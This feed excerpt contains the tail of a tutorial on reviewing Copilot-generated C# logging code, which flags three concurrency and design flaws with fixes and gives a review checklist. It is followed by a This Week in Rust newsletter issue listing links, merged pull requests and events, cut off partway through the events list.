<p>Once you have provided the prompt as input to Github Copilot, it will parse the input and generate several files in your project. Figure 2 shows the two projects in the Solution Explorer window — the console application project and the <code>AsyncLogger</code> class library project.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/AI-Csharp-Solution-Explorer.png?w=622" alt="AI Csharp Solution Explorer" class="wp-image-4191830" width="622" height="1024" sizes="auto, (max-width: 622px) 100vw, 622px"><figcaption class="wp-element-caption"><p>Figure 2</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>The <code>AsyncLoggerService</code> class uses the <code>System.Threading.Channel</code> static class to write logs of type <code>LogEntry</code> in the log target, which can be a text file or a database. The <code>System.Threading.Channel</code> class contains two methods to create channels, the <code>CreateBounded</code> and the <code>CreateUnbounded</code> methods.</p>



<p>While <code>CreateBounded</code> is used to create a channel that holds a finite number of messages, <code>CreateUnbounded</code> is used to create a channel with unlimited capacity. You can learn more about working with <code>System.Threading.Channel</code> from my earlier article <a href="https://www.infoworld.com/article/2263338/how-to-use-systemthreadingchannels-in-net-core.html">here</a>.</p>



<h2 class="wp-block-heading">Reviewing the AI-generated code</h2>



<p>Although GitHub Copilot will generate the complete source code of the <code>AsyncLogger</code> library for you, you should carefully examine — and thoroughly test — the generated code before you use it in production. For example, when I submitted the above prompt to Copilot, the code generated included three issues that needed to be addressed. Let’s take a look. </p>



<h3 class="wp-block-heading">Unbounded channel oops</h3>



<p>In the <code>AsyncLoggerService</code> class, GitHub Copilot included the following code that uses an <code>Unbounded</code> channel. </p>



<pre class="wp-block-code"><code>_channel = Channel.CreateUnbounded<logentry>(
    new UnboundedChannelOptions { SingleReader = true, SingleWriter = false });
</logentry></code></pre>



<p>There is a major flaw in this approach. If this code were used in production, memory consumption could surge dramatically under burst traffic (say, 10k or more requests per second). This growth in memory usage could result in GC pressure and eventually a crash of the application.</p>



<p>A better approach is to use a bounded channel with an explicit backpressure strategy, as shown in the code snippet given below.</p>



<pre class="wp-block-code"><code>_channel = Channel.CreateBounded<logentry>(new BoundedChannelOptions(10_000)
{
    FullMode = BoundedChannelFullMode.DropWrite // or Wait
});
</logentry></code></pre>



<h3 class="wp-block-heading">Fire-and-forget oops</h3>



<p>In the <code>LogAsync</code> method, GitHub Copilot included the following statement that contains a fire-and-forget call with no retries and no information if the write operation fails (i.e., if the channel is already closed).</p>



<pre class="wp-block-code"><code>_channel.Writer.TryWrite(entry);
</code></pre>



<p>A better approach is to include a fallback path as shown in the code snippet below.</p>



<pre class="wp-block-code"><code>if (!await _channel.Writer.WaitToWriteAsync())
{
    TryWriteFallback("Channel closed or unavailable");
    return;
}
await _channel.Writer.WriteAsync(entry);
private void TryWriteFallback(string text)
{
    try
    {
        var path = _config.FallbackFilePath ?? "fallback-errors.log";
        var dir = Path.GetDirectoryName(path);
        if (!string.IsNullOrEmpty(dir) &amp;&amp; !Directory.Exists(dir)) 
            Directory.CreateDirectory(dir);
        File.AppendAllText(path, $"[{DateTime.UtcNow:o}] {text}{Environment.NewLine}");
    }
    catch
    {
        // swallow - nothing else we can do
    }
}
</code></pre>



<p>The <code>WaitToWriteAsync</code> method returns true if space is available to write an item, false otherwise. Hence, if no space is available, the <code>TryWriteFallback</code> method will be called and the log written to the fallback-errors.log file.</p>



<p><strong>Using Sync over Async in a Constructor</strong></p>



<p>Finally, GitHub Copilot included the following piece of code in the constructor of the <code>AsyncLoggerService</code> class. </p>



<pre class="wp-block-code"><code>_target.InitializeAsync(_cts.Token).GetAwaiter().GetResult();
</code></pre>



<p>Using sync over async in a constructor in C# is considered an anti-pattern. The reason is because constructors cannot be asynchronous, i.e., you cannot mark a constructor as asynchronous using the <code>async</code> keyword. As a result, you will have to make blocking calls and wait for your asynchronous code to complete execution. And this could result in thread starvation and a deadlock.</p>



<p>A better alternative will be to move the initialization code out of the constructor as shown below. </p>



<pre class="wp-block-code"><code>public async Task InitializeAsync()
{
    await _target.InitializeAsync(_cts.Token);
}
</code></pre>



<h2 class="wp-block-heading">AI-generated code review checklist</h2>



<p>You should verify each item of the following checklist before you integrate AI-generated code into your application. </p>



<ul class="wp-block-list">
<li>Does the code address all specified requirements?</li>



<li>Is the code well-documented?</li>



<li>Are there any security vulnerabilities or security anti-patterns?</li>



<li>Does the code follow C# coding standards and guidelines?</li>



<li>Are the algorithms efficient as far as performance is concerned?</li>



<li>Is the code testable, extensible, and maintainable?</li>



<li>Is the code testable with proper abstractions?</li>



<li>Does the code check for security vulnerabilities such as SQL injection and XSS?</li>



<li>Does the code incorporate N + 1 queries or other inefficient data access approaches?</li>



<li>Does the code comply with naming conventions and code organization standards?</li>



<li>Does the code incorporate error handling, logging, input validation, and configuration?</li>



<li>Does the code use asynchronous programming approaches?</li>



<li>Does the code meet the desired code coverage expectations?</li>
</ul>



<h2 class="wp-block-heading">Takeaways</h2>



<p>AI can help you create all of your boilerplate code, provide suggestions for best practices, and greatly speed up your exploration and research efforts. However, you should remember that AI is not a replacement for human intelligence, experience, and innovation. You should treat your AI-powered coding tool as your coworker or assistant and not your replacement. </p>



<p>You should take advantage of AI to do all of the tedious, monotonous work so that you can concentrate on the architecture, innovation, and other aspects of software architecture and development that require human involvement. You can take advantage of AI to generate your application’s architecture and design as well. However, the generated architecture and design should be for your reference only — it is entirely on you to decide how much of it you should use and what you need to replace.</p>



<p>Here’s the final word: AI-powered coding tools will help you when you provide them with the correct context and clear instructions. Be sure to review the generated code carefully, and test thoroughly before deploying to production. Expect your AI coding tool to make mistakes, and be prepared to make changes (perhaps over many iterations) to get the performant, reliable, secure, and maintainable code that you need.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 658]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3640170/tools/this-week-in-rust-this-week-in-rust-658/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640170/tools/this-week-in-rust-this-week-in-rust-658/</guid>
<pubDate>Thu, 02 Jul 2026 07:10:00 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/06/30/Rust-1.96.1/">Announcing Rust 1.96.1 | Rust Blog</a></li>
<li><a href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/">The many journeys of learning Rust | Rust Blog</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#foundation">Foundation</a></h5>
<ul>
<li><a href="https://rustfoundation.org/media/rust-foundation-trusted-training-program-launches-giving-learners-a-mark-of-quality-to-trust/">Rust Foundation Trusted Training Program Launches, Giving Learners a Mark of Quality to Trust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://scientificcomputing.rs/monthly/2026-06">Scientific Computing in Rust #19 (June 2026)</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://slint.dev/blog/slint-1.17-released">Slint 1.17 Released</a></li>
<li><a href="https://blog.antoyo.xyz/rustc_codegen_gcc-progress-report-42">rustc_codegen_gcc: Progress Report #42</a></li>
<li><a href="https://hovinen.me/announcements/2026/06/24/introducing-test-that.html">Introducing Test That!</a></li>
<li><a href="https://hovinen.me/announcements/2026/06/24/introducing-test-that.html">Introducing Test That!: A rich test assertion library for Rust from the original author of GoogleTest Rust</a></li>
<li><a href="https://github.com/shihuili1218/rssh/blob/main/docs/article_arch_en.md">Inside RSSH: one Rust crate, three binaries, and the Tauri lessons along the way</a></li>
<li><a href="https://github.com/Aleixenandros/Rustty/releases/tag/v1.38.0">Rustty 1.38 – accessibility &amp; keyboard nav</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/06/25/guardiandb-0-17-0-secure-namespaces-iroh-1-0-and-the-arrival-of-the-odm/">GuardianDB 0.17.0: Secure namespaces, Iroh 1.0, and the arrival of the ODM</a></li>
<li><a href="https://dev.to/iam_suriyan_b9078a5b3a553/building-a-real-time-voice-agent-runtime-in-rust-no-gil-one-binary-2000-calls-a-box-12ko">Building a real-time voice-agent runtime in Rust: no GIL, one binary, 2,000 calls a box</a></li>
<li><a href="https://aimdb.dev/blog/aimdb-bring-your-own-connector">AimDB: Bring Your Own Connector</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.8.0">kache 0.8.0: zero-copy restores on Windows (ReFS)</a></li>
<li><a href="https://miskibin.github.io/warbell/">Warbell — a castle-defense action-RPG built with Bevy 0.19</a></li>
<li><a href="https://dev.to/gregorymc86/i-built-a-macos-ftp-client-entirely-in-rust-no-electron-no-webview-2a8i">I built a macOS FTP client entirely in Rust - no Electron, no webview</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://blog.yoshuawuyts.com/hoisting-expressions">Hoisting Expressions</a></li>
<li><a href="https://blog.jetbrains.com/rust/2026/06/25/rust-web-development-2026/">The Unglamorous Side of Rust Web Development</a></li>
<li><a href="https://dev.to/ernesto_arias_148b35bc25d/-how-i-found-out-52-of-my-knowledge-graph-was-duplicates-and-what-i-did-about-it-3coh">How I Found Out 52% of My Knowledge Graph Was Duplicates (and What I Did About It)</a></li>
<li><a href="https://jtjlehi.github.io/2026/06/25/novel-rust-error-handling.html">A Novel Approach to Rust Error Handling</a></li>
<li><a href="https://encore.dev/blog/redis-runtime">We put a Redis server inside our runtime</a></li>
<li><a href="https://kerkour.com/rust-high-performance-memory-fragmentation-allocations">High-performance Rust: Understanding and eliminating memory fragmentation</a></li>
<li><a href="https://kunobi.ninja/blog/kache-storage-worktrees">AI and worktrees are filling our disks: kache storage, measured</a></li>
<li><a href="https://dev.to/sicklefire/designing-a-cross-platform-terminal-memory-visualizer-in-rust-2365">Designing a cross-platform terminal memory visualizer in Rust</a></li>
<li><a href="https://pranitha.dev/posts/rust-and-memory-allocators">Your Rust Service Isn't Leaking — It Could Be the Allocator</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li><a href="https://medium.com/@vbasky/measure-dont-guess-building-viser-a-content-adaptive-video-encoding-optimizer-in-rust-7675edd6943a">Measure, Don't Guess: Building viser, a Content-Adaptive Video Encoding Optimizer in Rust</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-sql-and-sqlx-by-building-a-book-library-cli-in-rust/">Learn SQL and SQLx by Building a Book Library CLI in Rust</a></li>
<li>[series] <a href="https://aibodh.com/posts/async-rust-chapter-2-what-async-fn-compiles-into/">Reasoning About Async Rust with State Machines</a></li>
<li><a href="https://mainmatter.com/c-to-rust-migration-book/">The C to Rust Migration Book</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://github.com/pbkx/deconvolution">deconvolution</a>, a image deconvolution and restoration library.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1621">pbkx</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>
<p><a href="https://github.com/kmolan/multicalc-rust/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22">multicalc - good first issues</a></p>



<ul>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/93">AimDB - Add minimal example: hello-single-latest</a></li>
<li><a href="https://github.com/aimdb-dev/aimdb/issues/109">AimDB - Wire <code>.transform()</code> and <code>.transform_join()</code> into stage profiling</a></li>
<li><a href="https://github.com/SzilvasiPeter/edid-info/issues/1">edid-info - Increase test coverage with real EDID data</a></li>
<li><a href="https://github.com/SzilvasiPeter/edid-info/issues/2">edid-info - Finalize CTA-861 extension implementation</a></li>
<li><a href="https://github.com/SzilvasiPeter/edid-info/issues/3">edid-info - Support additional EDID extension block types</a></li>
</ul>
<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>426 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-23..2026-06-30">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/157996">drop the full-crate AST walk in <code>check_unused</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158185">make <code>stable_crate_ids</code> reads lock-free after crate loading</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158239">rework lint pass running</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157271">simplify some <code>proc_macro</code> things</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158326">add <code>io::ErrorKind::TooManyOpenFiles</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/153097">expand <code>OptionFlatten</code>'s iterator methods</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155625">move <code>std::io::Error</code> into <code>core</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158053">optimize network address parser</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17106">add <code>-Zhint-msrv</code> flag</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17237"><code>filter_map_next</code>: clean-up, overhaul suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17318"><code>chunks_exact_to_as_chunks</code>: Prevent syntactically invalid suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17317"><code>chunks_exact_to_as_chunks</code>: Use correct method name in message</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17316"><code>chunks_exact_to_as_chunks</code>: Pick iter method depending on mut-ness</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17302"><code>non_ascii_literal</code>, <code>invisible_characters</code>: don't suggest a fix on raw strings</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17228">create a single <code>ConstEvalCtxt</code> in <code>expr_eagerness</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17299">detect new range types in <code>higher::Range</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17270">do not trigger <code>manual_option_zip</code> when map receiver is a lazy evaluated expression</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16746">enhance <code>needless_late_init</code> to cover grouped assignments</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17257">fix: <code>borrow_as_ptr</code> is triggered on generated code</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22466">add diagnostic for E0596</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22645">add fixes add '.await' for <code>type_mismatch</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22646">crash on lowering consts with associated types</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22640">crash when hovering on anonymous consts</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22582">only run <code>Drop::drop</code> when implemented</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22633">mark <code>inline_convert_while_ascii()</code> as <code>unsafe</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22115">switch out lsp-types for gen-lsp-types</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>Overall, the week was fairly neutral, with no meaningful shift on most benchmarks on any of our statistics.</p>
<p>Triage done by <strong>@simulacrum</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=8b6558a02b2774acfb25cf15e199467c37ba7490&amp;end=7dc2c162b9c197aaa76a6f9e7534569537830a01&amp;absolute=false&amp;stat=instructions%3Au">8b6558a0..7dc2c162</a></p>
<p>2 Regressions, 1 Improvement, 7 Mixed; 5 of them in rollups
34 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/master/triage/2026/2026-06-29.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/issues/143989">Tracking Issue for LocalKey/Cell::update</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/142312">Tracking Issue for <code>{str, [T], Path}::trim_prefix</code> and <code>{str, [T]}::trim_suffix</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155697">Stabilize c-variadic function definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/69835">Tracking Issue for layout information behind pointers</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158523">Fix feature gate for <code>repr(simd)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/154585">reat no_mangle_generic_items as hard error instead of lint warning</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158522">Lint against invalid POSIX symbol definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158302">Fix <code>overflowing_literals</code> lint with repeated negation</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158504">stabilize <code>extern "custom"</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158057">Don't escape U+FF9E and U+FF9F in <code>escape_debug_ext</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1007">Decouple <code>BackendRepr</code> from ABI alignment</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1005">MCP: Stabilization strategy for rustc parallel frontend</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#language-reference"></a><a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>
<ul>
<li><a href="https://github.com/rust-lang/reference/pull/2166">Fields must fit in the type, even for repr(Rust)</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-rfcs"></a><a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3527">RFC: Associated const underscore</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3980">Add <code>extern "custom"</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#unsafe-code-guidelines"></a><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>
<ul>
<li><a href="https://github.com/rust-lang/unsafe-code-guidelines/issues/615">Opsem extension proposal: atomic volatile accesses</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a> or
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3977">Method chain as item</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3980">Add <code>extern "custom"</code></a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-01 - 2026-07-29 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-01 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210366/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455932/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Charlottesville, VA, US) | <a href="https://www.meetup.com/charlottesville-rust-meetup">Charlottesville Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/charlottesville-rust-meetup/events/315211402/"><strong>Learning Game Development the Hard Way with Rust and Bevy</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/313345243/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-07-04 | Virtual (Kampala, UG) | <a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587">Rust Circle Meetup</a><ul>
<li><a href="https://www.eventbrite.com/e/rust-circle-meetup-tickets-628763176587"><strong>Rust Circle Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-05 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095287/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-07 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315060981/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
